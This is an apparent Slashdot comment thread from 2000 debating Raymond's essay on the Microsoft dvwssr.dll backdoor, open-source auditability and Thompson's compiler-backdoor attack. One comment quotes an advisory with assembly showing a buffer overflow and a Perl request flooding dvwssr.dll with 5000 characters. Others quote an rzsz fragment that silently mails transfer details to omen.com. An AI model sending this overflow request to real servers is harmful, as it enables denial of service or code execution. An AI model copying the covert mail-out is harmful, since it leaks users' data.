using any of the affected products should delete all copies of the
file Dvwssr.dll from their servers. The FAQ provides step-by-step
instructions for doing this. The only functionality lost by deleting
the file is the ability to generate link views using Visual Interdev
1.0.

Yes, the programmers who put this in were assholes. Kinda like a few Linux programmers who might be tempted to add code saying that "Microsoft engineers are weenies". No, this does not mean that Microsoft was trying to pull anything.

And especially: It does NOT "prove" by any stretch of the imagination that Open Source is superior to closed or proprietary source. There are far too many naive OSS/Linux advocates who seem to think that backdoors and deliberate exploits somehow have "Back Door Here" comments liberally sprinkled around the offending code. It takes considerable time, effort, intelligence, and dumb luck to audit code, and to look not only for the single point of entry, but the even more difficult to spot exploits with possible multiple applications.

ESR and the zelots who take up his arguments without careful consideration of the facts are rapidly making themselves a royal PITA. In case you haven't noticed, over one million copies of Windows 2000 have shipped since its introduction (real copies generating real revenue) and from my own experience, as well as that of others, it's pretty damn good. Good enough to make it easy to ignore Linux and all the stupid political baggage that it's acquired.

Re:hello?!?! this is only a day or two late

[arensb]

Open-source software does help expose deliberately placed backdoors, however, it does not target the problem that caused the Microsoft flaw in the first place: untrustworthy programmers. No project, closed source or open source, run under the cathedral model or the bazaar model, can escape the fundemental concept of information security: you must place at least some implicit trust on the people who build/mantain/administer your software.

You are correct. When I install the latest version of a compiler for my users, I have to trust the authors, the people who run the ftp site whence I got it, and so forth. My users have to trust me.

What openness does is to reduce the level of trust you must place in anyone. If I don't trust the person who built an RPM, I can fetch an SRPM from somewhere else, or just get the source from the original author. If I have doubts about the source, I can read it. If I don't have the skill to read the source and find problems, I can read Bugtraq and see if anyone else has found any problems.

Likewise, in my work as a sysadmin, I am held accountable by the fact that all of my users and coworkers can also read the source or Bugtraq, if they want to take the time to do so. They also know where I work, so if they really get mad at me, they can come after me with torches and Frankenstein rakes.

The way I read ESR's article is that in the OSS world, no such problem would have remained undetected for four years, at least not in a widely-used package.

In the closed-source world, you have to trust the authors and distributors of the software. They may be the most honest and intelligent people in the world, but you still have to trust them: there aren't many mechanisms for finding out whether your trust is misplaced.

PLEASE MODERATE THIS

[Mr.+Piccolo]

EEEEEE..RRRRRR....OOOOO....SSSSS.
EEEEEE..RR...RR..OO...OO..SS...SS
EE......RR...RR..OO...OO..SS.....
EE......RR...RR..OO...OO..SS.....
EEEEEE..RRRRRR...OO...OO...SSSS..
EEEEEE..RRRRRR...OO...OO....SSSS.
EE......RR..RRR..OO...OO.......SS
EE......RR...RR..OO...OO.......SS
EEEEEE..RR...RR..OO...OO..SS...SS
EEEEEE..RR...RR...OOOOO....SSSSS.

Crashing VMS

[flink]

Kill an M job from the VMS promt. Slap forehead. Call computer room.

Re:Way to sling the FUD. Here's some more...

[Eimi+Metamorphoumai]

The point isn't whether any of those particular allegations are true or not. The point is that with closed source software, you can't tell. If the source is open, and someone alleges that you have a secret backdoor that the NSA can use, it's really easy to demonstrate that either, yes, there is a backdoor, or no, there's not. With closed source you never know what's lying around in the background, waiting to be discovered years later.

Re:This is getting pethetic

[Eimi+Metamorphoumai]

Second, this is not, I repeat, *not* years old. Its more like days old...

This depends a great deal on how you define the age of a bug (backdoor, feature, whatever), and brings up an important point. The entire Microsoft idea of security, security through obscurity, is that there is no bug or flaw until it's discovered, that systems are secure until until an exploit is found. The opposite model is to claim that a bug is a bug whether it's found or not, and that the goal of securing a system is to find all exploits that are there, and then track them down. The code has been there for four years; the fact that it was widely exposed only a few days ago does not make it a "new" problem.

Preaching to the choir

[Evro]

Why doesn't he submit this thing to the NYTimes, WSJ, CNN, CNET, ZDNet, and Wired? Is there anybody reading Slashdot that didn't know this already? I'm not saying it's a stupid essay, I'm saying it's stupid for it to be posted here and nowhere else.

__________________________________________________ ___

oops

[Evro]

I emailed ESR about this and he said he already sent it to some more mainstream media outlets. So /me feels dumb.

__________________________________________________ ___

Re:The economics of backdoors

[Black+Parrot]

> Seriously, my question is, how can you quantify the expenses and losses of something like this??

I was wondering last night... what is it going to be like when it happens again, "for real". Say five, ten, twenty years from now, the internet economy is well entrenched, everyone relies on it, and suddenly word leaks out that there is a wide-open door in the back of some widely used server system. Only this time, you can't fix it by merely deleting a "spare" library file.

If you're running closed source, you shut down your servers and wait for a patch from the vendor. And hope that there is enough left of the internet to allow you to download the patches, rather than waiting for FedEx!

This is not, IMO, a risk that you - or society at large - can afford to take.

--

Re:on and off topic- Regarding the above posts.

[Black+Parrot]

> Any post that does not conform to the Open Source Movement party line is instantly moderated to oblivion where no user, especially no non-logged in user (since the change in default score display setting), is likely to see it, thereby supressing dissenting opinions.

Simply put, your facts are incorrect. I see innumerable posts with dissenting opinions. I see posts that go against the "party line" moderated up to 5. I also see "party line" posts that were moderated high early on brought back down as the "dissenters" moderate them.

I even saw your post.

There's nothing wrong with your sentiments; you simply miss the facts.

--

Re:Of course, KT's CC hack wasn't Open Source

[Black+Parrot]

> The Thompson hack included the secondary hack that if the source to the compiler itself were recompiled, the backdoor-creating code would be silently re-inserted into the output

The solution to that is to compile your compiler with some other brand of compiler, in which case the malignant code will not be inserted.

In practice, I don't think the Thompson hack would work very well anyway, or at least he would not get away with it for very long.

First, the compiler must detect something to trigger the special output. It cannot just assume anything it compiles is the code for itself. (In this age of easter eggs we might not be surprised to find a flight simulator in our compilers, but if we compiled our flight simulator and got a compiler for the executable, we would be alarmed indeed.)

From there, the question arises of what the hack should detect.

If it just detects the file name, you would only need to rename your compiler and recompile it, and then you would have a clean compiler to go forward with.

If it detects the actual source, you could similarly transform your source by renaming all the variables, functions, macros, etc., compile the result, and again obtain a clean compiler to go forward with.

The only thing I can see that would beat those kinds of safeguards would be to detect the structure of the source code - no easy task.

And even if the hack detected structure, how long would the structure go unchanged? If someone tweaks the code to fix a bug, the structure changes, the detection fails, and you again obtain a clean compiler.

It looks to me like the hack must detect the structure of an extremely small segment of code to avoid quick extinction due to workaday bug fixes and enhancements. But it must also juggle this against the need to detect a large enough structure to ensure that the program was indeed a compiler, since the game would also be up if it misdetected itself in what was actually a flight simulator.

And even then, recompiling with another compiler would surely provide the necessary purge.

I find the Thompson hack extremely interesting as an intellectual exercise, but in practice I don't think it would work, or at least not for very long at all.

Closed source is the way to go for back doors, though even then it's likely just a matter of time before you get caught. [Insert SecurityByObscurity mantra here.]

--

Re:ESR is wrong...Misleading Article

[scheme]

Read access to these files can be enough to allow a clever hacker to find further security holes in a web site.

I'm not sure what this gets you. If you're a developer then you can already execute the code. The only situation where this is a benefit is if the machine is hosting multiple independent sites, then a developer for one site could read the code for another site. This is a problem but not as serious as others such as buffer overruns, and real backdoors.

Re:The economics of backdoors

[scheme]

Open source should always be immune, you can look at what it does before you run it.

Seriously, how many people examine all the code for all the programs on their machine? Yeah, with open source you can look at the source but no one really has the time to examine the several hundred MB of source that their system was compiled from.

ESR is wrong...Misleading Article

[scheme]

The backdoor isn't as bad as ESR is implying. In order to exploit the code, the attacker needs to be given authoring privileges on the server. So this is primarily restricted to developers and only lets the attackers read .asp or .asa files.

Also the dll was present in interdev 1.0 but isn't found in later versions or in the releases on other platforms besides windows on x86. There are also questions about whether microsoft or whether the original developer vemeer technologies put it in. Therefore saying that microsoft designed this is irresponsible on the part of ESR and Slashdot.

I also have objections to ESR saying that webmasters are going be pulling out their hair over this. If the sites had upgraded to a latter version of InterDev then there's no problem. Plus, only web developers can exploit this and then only to view .asp/.asa files so its not as serious as ESR makes it out to be. Even those sites running InterDev 1.0, can get rid of the backdoor by deleting the dll since it codes for a view links feature which is not essential.

The original posting about the exploit is here

Re:ESR is wrong...Misleading Article

[the+eric+conspiracy]

only lets the attackers read .asp or .asa files.

Read access to these files can be enough to allow a clever hacker to find further security holes in a web site.

Re:ESR is wrong...Misleading Article

[Abigail-II]

Read access to these files can be enough to allow a clever hacker to find further security holes in a web site.

That's an arguments that's also used against open source - that it would expose security holes. Remember, security through obscurity usually isn't very secure to begin with.

-- Abigail

Re:ESR is wrong...Misleading Article

[MrBogus]

You'd be sadly surprised of how many IIS developers hardcode the SQL Server SA password into their scripts.

Re: Thompson's paper and GCC in practice

[Abigail-II]

Even if I do a two-phase build, GCC is built with the braindead local compiler, so when everything is rebuilt with GCC it is *far* less likely to contain any hidden surprises.

The problem with that is that the original GCC might be free of any backdoors, but that the original backdoor is actually in the "braindead local compiler". It could built a corrupted version of GCC for you; one smart enough to determine rebuilds of itself.

The entire point of Thompsons idea is that once you worked with a compiler you didn't built yourself, everything it makes is potentially tainted. Including itself.

-- Abigail

Re:Complacency

[Abigail-II]

ESR's point was that Perl itself (...) will never have deliberately-placed backdoors;

But Perl has. $ cd perl-5.6.0
$ grep 'bin/mail' *.c
perl.c:if(PL_rsfp= PerlProc_popen("/bin/mailroot","w")){/*heh,heh*/
$

-- Abigail

Re:Ummmmm NO.

[nnet]

telnet www.microsoft.com 80
Trying 207.46.131.137...
Connected to microsoft.com.
*SNIP*
Server: Microsoft-IIS/5.0
Date: Sun, 16 Apr 2000 15:29:47 GMT

I use Linux specifically because it's Open

[toofast]

People say NT is unreliable. That's crap. People say NT is insecure. Kinda. People say NT has backdoors. Ooooh yea.

I switched many of my server from NT to Linux, the main reason being that Open Source OS's tend to have fewer bugs, and when the bugs are found, patches and updates occur very quickly.

You can be sure there are no backdoors in OSS... I mean, if someone had the balls to but backdoors in OSS they'd be ridiculed 2 minutes after the software release.

The second reason I don't use NT anymore is the bloat factor. One of my SMB servers was a P166/64MB RAM, and as soon as I installed SP6 and Option Pack 4, the hardware was rendered useless. A nice install of Linux quickly put the extra "umph" that machine needed.

Be it for backdoors, security or updates, nothing beats OSS.

Re:I use Linux specifically because it's Open

[zorgon]

I partially agree that Windows 2k is getting too bad a rap. I mean, its a damn good OS, ideally.

In all friendliness (please do not consider this a flame), I think the only way you can make this statement is if you have never used a "good OS."

To be fair to you, perhaps this is just a semantic problem -- I for one do not consider "feature-rich" to be "good" unless other criteria of "goodness" -- reliability and scarcity of bugs come to mind -- are also met. soft's kitchen sink approach to OS (and applications) are no doubt satisfactory if sheer number of features are the highest priority. But not everyone agrees with that.

So now that I've made that inflammatory statement, I'm going to have to provide an equally inflammatory support (pause to don asbestos underwear) -- I'm going to submit DEC VMS as a real world example of a "Good OS" (wait, let me finish!). VMS was somewhat feature rich, but it nevertheless had very robust underpinnings (like virtual memory, a journaling filesystem, development API, hideously complete documentation, and the ability to work with a cluster of CPUs) that were well ahead of its time (for small computers anyway). VMS did rather tightly regulate what you could do (particularly with hardware, DEC brand only was the rule in the old days), and I found the user interface frustrating (file names in particular). So perhaps low marks for ease of use and extensibility, but the systems were powerful and pretty much bulletproof -- I never heard of anyone crashing a VMS machine (okay, out with the anecdotes now, everyone over 35 will now come out with the time they saw a VMS machine crash). But I'd say that was a good OS. Couldn't do absolutely everything, but what it could do it did so very well and without gagging. NT on the other hand, barfs every time if you look at it funny. Problem there is probably the kitchen-sink development philosophy, which has infinite possibilities both for capability and failure.

IMHO, the kitchen sink approach can only result in a "good OS" or "good applications" in an open source environment for obvious reasons. Linux is a great example. Just my $0.02...

Re:I use Linux specifically because it's Open

[BlurryEyed]

48 hours!??! It took them 4 years to email you that fix. Come on man, read the posts, Eastereggs and backdoors can NOT exist on OSS without everyone knowing about it. And for you ignoring Linux, well you're reading /.

Re:I use Linux specifically because it's Open

[Pxtl]

I partially agree that Windows 2k is getting too bad a rap. I mean, its a damn good OS, ideally. I'm not an expert geek, so Linux is out of my league (although I have a great deal of respect for those who use it) and 2k is a good mix of NT's power and 9x ease-of-use. I mean, the new merging of the 2 OS's is sweet, and, I know this is petty graphics stuff, but alpha blending in the gui is just cool. That still doesn't compensate, however, for the just obscene and idiotic list of bugs. A friend had an early release of 2k, and had an interesting problem. After an uptime of several days (weeks? Idunno, pretty long by M$ standards, whatever) he rebooted after a software install. Upon restarting, it seemed that 2k had lost the kernel. Gone. Poof. Booted into command prompt and it was not anywhere. How the fsck do you lose the friggin' kernel? I might be mucking up the details, I was on the phone with the guy as it happened, as he wasdoing a running commentary. The details might be muddled. He's switched back to '98 and is planning on a *nix partition.

Re:I use Linux specifically because it's Open

[51M02]

When few days would be needed to find such backdoor on Apache (and OSS in general) it took them 4 years to find it. The real question is: Does someone is analysing the Windows source code? If you are a MSCE, well you just have to hope they do because you won't be able to...

Binary != Source

[DragonHawk]

My, my. Are you really, really new to programming or something?

Um, no. Are you really, really new to the English language or something? You're missing my point entirely.

If you have a version of GCC without the source to match it, as in your given example, then you cannot be sure of what it is doing.

The whole point of KT's hypothetical hack was that it would be invisible from the programmer.

His hack was very much real, and not hypothetical as you insinuate. Again, it demonstrates the dangers of misplaced trust in pre-compiled binaries.

As KT demonstrated, you cannot trust the compiler.

If you are sure you have the source to the compiler you are using, and you have reviewed it -- or someone you trust has done the same -- then you can trust the compiler.

The problem in the KT case was, KT provided a pre-compiled binary that everyone assumed was good. Binary. Not source. Binary. Get it?

Re:Binary != Source

[Rakarra]

The problem in the KT case was, KT provided a pre-compiled binary that everyone assumed was good. Binary. Not source. Binary. Get it?

And... just how are you going to compile anything? Unless you're pounding out the binary from scratch or something, you're relying on someone else's binary. BINARY, not source. Example. You come home, install Red Hat, FreeBSD, Slackware, whatever. You now have a whole bunch of binaries on your system, for you hope aren't backdoored. You have the source? Well that's fine, but you're still trusting that the binaries on your system actually DO correspond to the source you're looking at. That was the original poster's point.

Of course, KT's CC hack wasn't Open Source

[DragonHawk]

But don't take my word for it, go read the Thompson paper on inserting self-reproducing malicious code into a compiler. He proves that, even with the source code you can never be 100% sure of what a program is actually doing.

*sigh*

While it is true that Open Source is not a panacea, the Ken Thompson C compiler backdoor does not apply. That particular exploit was only possible because people did not have the source to the binary needed to bootstrap a new machine into running Unix. They had to use a binary provided by Ken Thompson, who they had to trust.

And that is the real matter at hand -- trust. If you are not reviewing every line of code and then compiling every binary yourself -- and let's face it, most people don't have the resources to do that -- you better make damn sure you trust the provider of your pre-compiled binaries.

What if Red Hat slipped a similar back door into their compiler package? What if one of the Debian maintainers decided to do it with their's? How about if both of the above are honest, but CheapBytes does? How about the company they subcontract to manufacture and distribute the boxed sets?

It is critical to remember that most "Open Source" installations are, in fact, using unreviewed, pre-compiled binaries, and not the source itself. If the provider of those binaries is trusted, then you can be confident of the benefits of Open Source. But if not... well, at least you can switch vendors easier then you can with Microsoft's products.

The single biggest question you have to concern yourself with in the security world is still: Who do you trust?

Re:Of course, KT's CC hack wasn't Open Source

[MWright]

The solution to that is to compile your compiler with some other brand of compiler, in which case the malignant code will not be inserted.

Yes- but how can you trust the other comiler? Maybe it also inserts backdoors- how can we be sure?

And even if the hack detected structure, how long would the structure go unchanged? If someone tweaks the code to fix a bug, the structure changes, the detection fails, and you again obtain a clean compiler.

I think that this is the only way you could be sure the compiler is alright- modify the compiler code you're about to compiler. Change the structure, the order that functions appear, rename commandline args, change every filename, etc.
It seems like a lot of work, but remember: Once you have one compiler you know works fine, you know that anything you compile with it will compile what you think it's compiling. (Confused yet? ;) )


-----

Re:Of course, KT's CC hack wasn't Open Source

[VAXman]

While it is true that Open Source is not a panacea, the Ken Thompson C compiler backdoor does not apply. That particular exploit was only possible because people did not have the source to the binary needed to bootstrap a new machine into running Unix. They had to use a binary provided by Ken Thompson, who they had to trust.

My, my. Are you really, really new to programming or something? The whole point of KT's hypothetical hack was that it would be invisible from the programmer. If you created a special version of GCC which would include the backdoor, and would detect if it was recompiling itself _without_ the backdoor, it would include the backdoor. Obviously the backdoor would not show up in the sources to GCC, because the source which had it would be deleted, but was compiled by a version which detected its absence, and would re-insert it in that case. If such a backdoor was implemented, it would be almost impossible to remove. It has absolutely nothing to do with open source vs. proprietary - in fact, open source is much more vulnerable to this problem, because the users have a false sense of security from looking at the source code, and believe that it what is actually executing on the machine without further verification.

And that is the real matter at hand -- trust. If you are not reviewing every line of code and then compiling every binary yourself -- and let's face it, most people don't have the resources to do that -- you better make damn sure you trust the provider of your pre-compiled binaries.

Incorrect. As KT demonstrated, you cannot trust the compiler. You can review the source, but it won't tell you anything at all about the code which the compiler actuallly generates.

Examining the assembler output will get you farther, but there still could easily be a backdoor in the assembler. You can look at the binary file itself, but can you trust the OS to load exactly that (and not "fix up" the binary somehow)? You can verify with a logic analyzer that the correct code is being fetched. But it would be a little more difficult to verify that the CPU is actually performing the correct operations, and not doing its own backdoor.

Jeez people, lighten up...

[Sonus]

You all don't have to take this so seriously. I don't mean about the possible security hole or whatnot, but of the message. Calling it dumb, immature, childish, unethical, or whatever it is is basically unjustified. Sure it is those things, but the beauty in it lies the fact that the original programmer got the world to see it. A good old fashioned joke on the rivalry. Sure it took 4 years to discover, but it got discovered. Hats off to the programmer.

If you're a programmer/developer you know how stressful that job can be at times. It's good to have a little humor. I use to work as a Sys Admin a little while back, and no way in hell is it as stressful as programming. Programmers have frequent deadlines, but as an admin it typically was pretty laid back in a well maintained network. Of course it depends on the job, because I've had a programming job that didn't require anything from me.

And why wasn't that so called encryption key encrypted itself?!? Because no one would ever find it. =)

ANYBODY IN THERE??

[FascDot+Killed+My+Pr]

there would never be a backdoor in open-source software

Write down the above quote on a post-it. Affix said post-it to your monitor. Then follow the link I provided. Read the paper. Then read the post-it. Then come back here and explain your sudden revelation.
--

"Never"?

[FascDot+Killed+My+Pr]

Never may sound like a pretty strong claim. But it's true. Because back doors (unlike some other kinds of security bugs) tend to stand out like a sore thumb in source code. They're hard to conceal, easy to spot and disable -- *if you have access to the source code*.

While it's true that Open Source is more (WAY more) secure than non-open, it's not a panacea. And making claims that it IS only invite people to try (and make the fall that much harder when it comes).

But don't take my word for it, go read the Thompson paper on inserting self-reproducing malicious code into a compiler. He proves that, even with the source code you can never be 100% sure of what a program is actually doing.
--

Re:Where's the back door?

[SEWilco]

The point is that you had to ask the question, and we can't tell you to look it up.

Just another ESR mouth off

[NeoMage]

Personally I've stopped paying any attention to anything that has the three letters ESR attached to it. This guy goes way out of his way to make stupid unfounded statements, but I guess it has helped him get rich by supporting the OSS side of things.

"Webmasters all over the world are going to be pulling all-nighters and tearing their hair out over this one"

No, no.... I don't think they will. Maybe it takes ESR all night to locate a DLL, but not any avid Windows user. If you are soooooo afraid that this supposed 'backdoor' is even what the press (including Slashdot) will have you believe it is then delete the file. Two seconds, done.

All ESR tries to do is breath fear into the corporate world about Microsoft products. It's strange that he is so quick to make public (false) comment against MS, but hardly ever against any of the other evils in his own community. Time to wake up ESR!! Get your hand off your stock price and actually find out the facts before showing the world what an ignoramous you are.

Source Code no Panacea

[Chris+Colohan]

I have to disagree with the main thesis of this article. Inspecting the source code does not guarantee that code is backdoor free. You have to inspect the object code (not source code) of your compiler as well, to ensure it doesn't insert a backdoor.

Ken Thompson brought this up quite clearly in his 1983 Turing award lecture, which has also been discussed in comp.risks. If you want to insert a backdoor into Linux, just booby trap a binary gcc distribution somewhere in such a way that the backdoor is reinserted when you re-compile gcc.

Open source is a good start, but it does not guarantee a lack of backdoors.

Re:Source Code no Panacea

[garver]

Don't know about you, but my compiler is open source, therefore I can look for compiler inserted backdoors as well. Same goes for libc and the kernel.

It would be very easy to "booby trap" the gcc source. Catch is that you have to get people to trust you and download your version. Go ahead and try; you won't be trusted long. Oh, and BTW, make sure you post your modifications. Wouldn't want to break the GPL now. I'm sure after your booby trap is found, people will gladly roast you for a GPL violation.

Reflections on Trusting Trust

[David+A.+Madore]

(As usual, because I have the bad luck of reading Slashdot in my time zone, my comment is hardly going to get read, let alone moderated. Oh well.)

I'm surprised nobody seems to remember Ken Thompson's ACM A. M. Turing Award reception speech, “Reflections on Trusting Trust”. If you haven't read that classic essay, you definitely should.

As mentioned in the Jargon File (which ESR surely knows about because he's the current editor of the Jargon File), Ken Thompson planted a Back Door in the login program of the first versions of Unix by planting another back door in the compiler itself. The back door was visible nowhere, neither in the sources of the compiler nor in those of the login program, and yet it was there all the same.

The moral of this is not that it might happen, but that it is possible. You've got to start trusting someone, somewhere. How do you know, after all, that Intel has not planted back doors in your microchip's microcode? Even if you could see the chip's complete source code (and you certainly cannot), the back door may be in the software that compiles the source code to the actual plans. (And even if you can see the complete plans and have a mammoth brain that can understand them, you can never be sure that there is no back door in the laws of physics.:-)

It would be quite possible, in Ken Thompson style, for a Linux distribution, say, RedHat, to put a back door in the version of gcc they use so that, even though they redistribute all the source, and pristine source at that, and even though the compiler bootstraps correctly, yet various binary programs are compiled with back doors in them. (Note that I'm not suggesting they could tamper with the binaries: that would be noticed sooner or later. Ken Thompson's trick is far more devious.)

You cannot bootstrap everything down to the hardware level, not even to the assembler level. And even if you do bootstrap everything, detecting the presence of a back door in the source is equivalent to the halting problem. Consequently, there is plenty of room for back doors even in an Open Source world.

The last thing I want to do is defend Microsoft. I don't use their products, so I frankly don't care how many back doors they might have planted. Nor do I want to advocate security through obfuscation, because that is the one thing that has never wored and never will. But I just want to say that security will never work if you don't start trusting at some point. Microsoft may have failed this trust, now or in other numerous occasions. But for ESR to say that there is no such need in the case of Open Source software is simply wrong.

some new trolling angle?

[Wah]

This will be moderated down soon, so get the message out regardless of what the moderators try to censor.

login, get an extra point, karma whore, get another, post early, post often, elucidate and use reason.


--

Re:some new trolling angle?

[Wah]

and when anonymous cowards whine about not getting their points heard, it's time for simple pointers, troll doggy, my karma has gone up four points this year, but that's because of killing trolls, killing trolls seems to be a negative thing to do. bizatch.

--

Re:some new trolling angle?

[Wah]

it's a matter of hard you want to try and control it. Try all the way, and you will fail. You can get real close though. Just because someting is possible, does not make it a moral imperative. Do you? I know they do.

--

The three letter people and what they try to say

[Raleel]

See, here's the thing. It doesn't matter what the actual problem with the flaw in the MS code is, it is still some level of a security breech that happened because the code was put in by irresponsible coders. Come now, commenting your code with cracks at other programmers is one thing, but deliberately injecting an insult into your code at the expense of comprimising a security model is completely wrong. Don't these people have code reviews? Apparently not, or the programmers were all so arrogant or in on the joke that they let it slide, without thinking about the consequences. I am a sysadmin for a living, and something like this bothers me, because of the impact that it has on my servers and my clients. My wife, a software engineer by trade, is morally and ethically outraged that something like this would go on. And I can sympathize with her, every time I look at a script kiddie, or even an actual skilled black hat hacker and I think about how they are wasting their skills.

Even if the facts are not totally straight, it is close enough to the truth for the average member of the populance who does not understand the complexities of dll's and so's to understand that Open Source can prevent Bad Things(tm) from happening to their computer. They know that while they may not look at the code, they have the ability to, and thusly someone else who DOES know the complexities of dll's and so's can review it for them, and they can feel safer. And that someone can be anyone..not just internal folks who are colored by their work place (I'll refrain from calling it indoctrination).

Yes, WE ALL KNOW THIS STUFF...but not everyone does! Revelation I know, but people do not know what Open Source means. They think it means free (as in beer). Hell, most people do not know what souce code is! ut what they should know is that if something says Open Source on the box (like where it says "Designed for Windows") they will KNOW that there are people looking at it, that they can look at it, and they know there is nothing hiding. If there are bugs and security holes, it is due to HONEST mistakes, as opposed to pranksters.

That's why it is nice to know that someone is trying to educate the users..even if you do not approve of ESR's or RMS's methods (Lord knows I wish they would shut up most days). You show people why it is better in your way, they'll do it in there way.

Re:Open Source's Glaring Security Problem

[ryanr]

You can't do that with closed-source software. Since you don't have the source code, you can't alter the code. So you (or that contract programmer who the company is letting go at the end of the month) can't run a little in-house exploit.

Of course I can. Never seen rootkit? Never seen either of the open-source Windows clones?

Re:...Nothing original, or really interesting.

[fluffhead]

Well, maybe it's not technically a "back door" into the server, but it certainly seems to compromise their (apparently incredibly weak) password "security" model for Frontpage. Now anybody sniffing for FP passwords can crack them easily, and any 2-bit skript kiddiez can deface these sites at whim with the disseminated passwords. I think I'll go ahead and disable FP extensions on all my sites now....
#include "disclaim.h"
"All the best people in life seem to like LINUX." - Steve Wozniak

Good Points? No, Same Points

[Patman]

I beleive in Open Source.

More importantly, I believe in the inherent security involved with OPen Source.

However, I don't believe that we need to be kissing Eric S Raymond's ass. C'mon, this article said nothing new about security, or open source, or anything.

Maybe if he'd brought up some new points, or had given new examples of how the Open Source movement had helped.

Rather, we get vague notions of how it would maybe do something.

I like ESR as much as the next guy, but I don't think his OPen Source work should give him a /. soapbox.

My two cents.

Re:Good Points? No, Same Points

[oozer]

I agree. Now that 'Open Source' is trendy and mainsteam there are too many preachers. There is really only one group of people who have earned the right to bang on about it and that is the people who made the source 'open', i.e. the coders who made Linux, Apache, Samba, gcc, etc. what they are today. Last talkers and more 'do-ers' is what Open Source needs.
--

When will ESR finally take a logic class?

[Salamander]

>Open-source software, subject to constant peer review, evolves and gets more secure over time. But as more crackers seek and find the better-hidden flaws in opaque binaries, closed-source software gets *less* secure over time.

If I wanted to go looking for security bugs, such as buffer underruns, it would be far easier with source than without. So it might appear that it would be _easier_ to compromise an open-source system.

But wait, you say, they'd be easier to find _if they were there_ but because everything's open to scrutiny all such "low-hanging fruit" would have been found, reported, and fixed in the open-source system long ago, whereas they'd remain "latent" in the closed-source program. Oh really? Are there more people who find and report bugs to people who can fix them, or more people who find bugs and either keep quiet or only distribute the information to other script kiddies? Are there more people of either type targeting Linux, or Windows? Do these factors perhaps make just a little bit of a difference in how the security of a system changes over time?

My point is not to say that open-source software is or is not in reality more secure than closed-source software, but that any such difference has little to do with availability of source. There may be a difference based on source availability, but that difference is overwhelmed by the basically non-technical difference based on how many "good guys" and how many "bad guys" have an interest in a particular platform. The statement that closed-source software becomes less secure over time is not based in any kind of facts or logic, though within any particular small sample it may seem true. As responsible, reasoned advocacy ESR's piece is barely half a step above "open good, closed bad" which is itself not even half a step above "Linux roolz, Windows sux". At least these almost-equivalent statements have the merit of brevity, in stark contrast to the pompous and verbose style we've all come to "enjoy" in ESR's writing.

...Nothing original, or really interesting.

[Garpenlov]

interesting stuff, and makes some good points about Open Source.

Is it just me, or is this the line they use to sum up every little blurb from a linux three-letter person? How can it make good points about open source, when we've already heard them a million times before?

Oh, and maybe ESR should do more research instead of just jumping on unfounded rumors... There is not a secret password that will let anyone into an IIS web site. The phrase, "Netscape engineers are weenies!" is the key used to encrypt the password used when Frontpage using web authors are being authenticated to the server.

(You know what else is really annoying? Forgetting to put a subject, and slashdot won't let you post, so I go back and add one, and then it tells me to slow down, I have to wait 70 seconds... "Slashdot: only one troll per user per 70 seconds!" Now that's quality. [Wonders if typing that in wasted enough time that he can submit the post now. Nope, it wasn't. Might as well ramble some more]).

Re:...Nothing original, or really interesting.

[wass]

How can it make good points about open source, when we've already heard them a million times before?

You may have heard a good point a million times, but it still is a good point. Of course, here at slashdot, we're more aware of the benefits of OSS and the like. I believe ESR was aiming his essay at the CIO's, IT peoples, and general PHB's, to show them that hey - you just don't know what's included in closed-source software.

Of course it's obvious to us, but those that buy MSFT because everybody else does, or because it's the office 'standard', may not realize these things.

I remember a quote from several months back where a MSFT chairman said something like "you just can't trust open source software, because you just don't know what's in it". Now ESR is pointing out the opposite.

Re:The economics of backdoors

[iCEBaLM]

If your electrician fucks up and electrocutes your cat, you would make him pay.

Why should Free software be immune to this?
Because system administrators can check the code themselves - that's due diligence.

Well, 2 reasons why free software should be immune.

1. Because its *free*, you paid your electrician.
2. Because its open source.
3. There is no intent to do damage, unlike with backdoors.

Now I belive there needs to be intent to do damage, or negligence on the coders part for them to be held accountable if its closed source. Open source should always be immune, you can look at what it does before you run it.

-- iCEBaLM

Open source "back door" example

[Butch]

Not exactly a back door, but rzsz from omen.com, which has a "complimentary" source version, had the following code inserted some time ago:

#ifndef REGISTERED
/* Removing or disabling this code without registering is theft */
if ((Totfiles > 0) && (!Usevhdrs)) {
sprintf(endmsg, "echo Unreg %s %s %ld %ld | mail rzsz@omen.com",
Progname, VERSION, Totfiles, Totbytes );
system(endmsg);

In other words, it mails out what you're transferring and how big it is to Omen.

As I recall, it took the *BSDs some time to notice and yank rzsz from the ports tree. I wonder if this version is still supplied as a "package" for any of the Linuces?

Re:Why is slashdot ignoring this important news?

[Zurk]

sorry to rain on yer parade but :

That is not correct.

We have been playing with dvwssr.dll and we've found a buffer overflow that stops the server from incoming connections, at least.

The code where the buffer overflow resides is:

mov eax, [edi+TEXTENSION_CONTROL_BLOCK.lpszQueryString]
test eax, eax
jz _text_581813FD
push eax
lea eax, [esp+14h+queryStringCoph]
push eax
call ds:lstrcpyA ;see here MS ENGINEERS: BUFFER OVERFLOW
test eax, eax
jz _text_581813FD
lea eax, [esp+10h+queryStringCoph]
push eax
call unescape_url

So, below is an example of how to exploit this vulnerability:
Of course, having the source code makes it harder to find
this types of bugs...

#!/usr/bin/perl
print "GET /_vti_bin/_vti_aut/dvwssr.dll?";
print "a" x 5000;
print " HTTP/1.1\nHost: yourhost\n\n";

We've been playing a little more trying to exploit this buffer overflow, and as we don't
have InterDevs installed on our IIS, we copied the .dll to /msadc directory, and with
this configuration, we have been able to make the code jump to our buffer.
Under this circunstances, the actual BO allow to execute arbitrary code in the target machine.
It's interesting to note that no log is generated as efect of this attack.

Re: Thompson's paper and GCC in practice

[coyote-san]

Before you use the Thompson paper to "prove" anything, remember that he implicitly assumed closed source development!

Specifically, his implicitly corrupted compiler C" is compiled with an explicitly corrupted compiler C'. The C' compiler must explicitly check for "odd" patterns and replace that code with odd values, and it's this corrupted code-generation code that is propogated in subsequent builds of the compiler.

But one of the greatest strengths of the open source ideal is that there's no assumption that any specific tool will be used. I've built the FSF tools from source tar balls many times, and more often than not I compile as many of them with the braindead local compiler. Even if I do a two-phase build, GCC is built with the braindead local compiler, so when everything is rebuilt with GCC it is *far* less likely to contain any hidden surprises.

Thompson's paper *is* something to consider in a pure-GCC environment. But the risk can be kept to a minimum level as long as GCC and the library can be compiled with a slow & stupid compiler bootstrapped from a provably correct assembler... or at least legacy Sun, HP/UX and AIX systems. :-)

(A sidenote for people unfamiliar with this type of bootstrapping -- you start with a "mini-C" assembly language compiler which can only handle a subset of C (e.g., no floating point math, no typedefs, no unions, etc.) Since it's in assembler, you can verify that the object code matches the source code... and the reduced functionality keeps the size reasonable. Your real compiler is written in this mini-C language, it accepts ANSI C but isn't fast, nor does it produce fast code. As a final step the newly compiled compiler (re)compiles itself.)

